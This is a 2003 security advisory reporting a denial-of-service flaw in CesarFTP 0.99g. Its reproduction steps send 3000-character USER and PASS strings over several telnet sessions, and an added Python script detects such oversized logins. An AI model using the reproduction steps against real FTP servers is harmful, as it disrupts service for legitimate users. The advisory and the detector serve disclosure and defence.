Tripbit Security Advisory | TA-250403

Severity:     Medium/High
Application:  CesarFTP Server 0.99g
Platform:     Windows
Class:        Denial of Service
Release Date: April 25th, 2003
Vendor:       http://www.aclogic.com

CesarFTP, an FTP server for Windows, has a problem in its authentication
handling. When the username and password buffers are too big, the server is
vulnerable to a Denial of Service attack.

First FTP session

    C:\> ftp <host> <port>
    Connection with 80.146.140.248 was established.
    220 CesarFTP 0.99g Server Welcome !
    User (80.146.140.248:(none)): username
    Password: ******
    ftp>

First Telnet session

    C:\> telnet <host> <port>
    220 CesarFTP 0.99g Server Welcome !
    USER (3000 A's)
    PASS (3000 A's)

Second telnet session

    C:\> telnet <host> <port>
    220 CesarFTP 0.99g Server Welcome !
    USER (3000 A's)
    PASS (3000 A's)

Third telnet session

    C:\> telnet <host> <port>
    220 CesarFTP 0.99g Server Welcome !
    USER (3000 A's)
    PASS (3000 A's)

Typing 'ls', for example, in the first FTP session now won't do anything,
because the server doesn't process the command. We may also open a second FTP
session, but it won't be able to connect to the server.

No solution for the moment.
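
With no fix available, the pattern shown in the sessions above can at least be detected in control-channel captures. The following is an added example, not part of the original advisory: the event tuple format, the 256-character limit, the threshold default and the sample addresses are all assumptions made for illustration.

```python
import re
from collections import defaultdict

MAX_ARG_LEN = 256      # assumed limit; tune to the longest real login on the site
SESSION_THRESHOLD = 3  # the advisory's reproduction uses three oversized sessions

# Constructed sample events: (source IP, session id, client command line).
SAMPLE_EVENTS = [
    ("192.0.2.10", 1, "USER username"),
    ("192.0.2.10", 1, "PASS secret"),
    ("198.51.100.7", 2, "USER " + "A" * 3000),
    ("198.51.100.7", 2, "PASS " + "A" * 3000),
    ("198.51.100.7", 3, "user " + "A" * 3000),   # FTP commands are case-insensitive
    ("198.51.100.7", 4, "PASS " + "A" * 3000),
    ("203.0.113.5", 5, "USER " + "B" * 300),
]

AUTH_CMD = re.compile(r"^(USER|PASS)(?: (.*))?$", re.IGNORECASE)


def oversized_auth(line, limit=MAX_ARG_LEN):
    """Return (command, argument length) for an overlong USER/PASS, else None."""
    m = AUTH_CMD.match(line.rstrip("\r\n"))
    if not m:
        return None
    arg = m.group(2) or ""
    return (m.group(1).upper(), len(arg)) if len(arg) > limit else None


def flag_sources(events, limit=MAX_ARG_LEN, threshold=SESSION_THRESHOLD):
    """Count distinct sessions per source that sent an oversized USER/PASS,
    keeping only sources that reach the threshold."""
    sessions = defaultdict(set)
    for src, session_id, line in events:
        if oversized_auth(line, limit):
            sessions[src].add(session_id)
    return {src: len(ids) for src, ids in sessions.items() if len(ids) >= threshold}


if __name__ == "__main__":
    for src, count in flag_sources(SAMPLE_EVENTS).items():
        print(f"{src}: {count} sessions with oversized USER/PASS")
```
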

The vendor has been notified but has not answered this report.

The information within this paper may change without notice. Use of this information
constitutes acceptance for use in an 'AS IS' condition. There are 'NO'
warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is
at the user's own risk.

This vulnerability has been found and researched by:

    posidron  posidron@tripbit.org
    rushjo    rushjo@tripbit.org

You can find the latest version of this warning under the following URL:
http://www.tripbit.org/advisories/TA-250403.html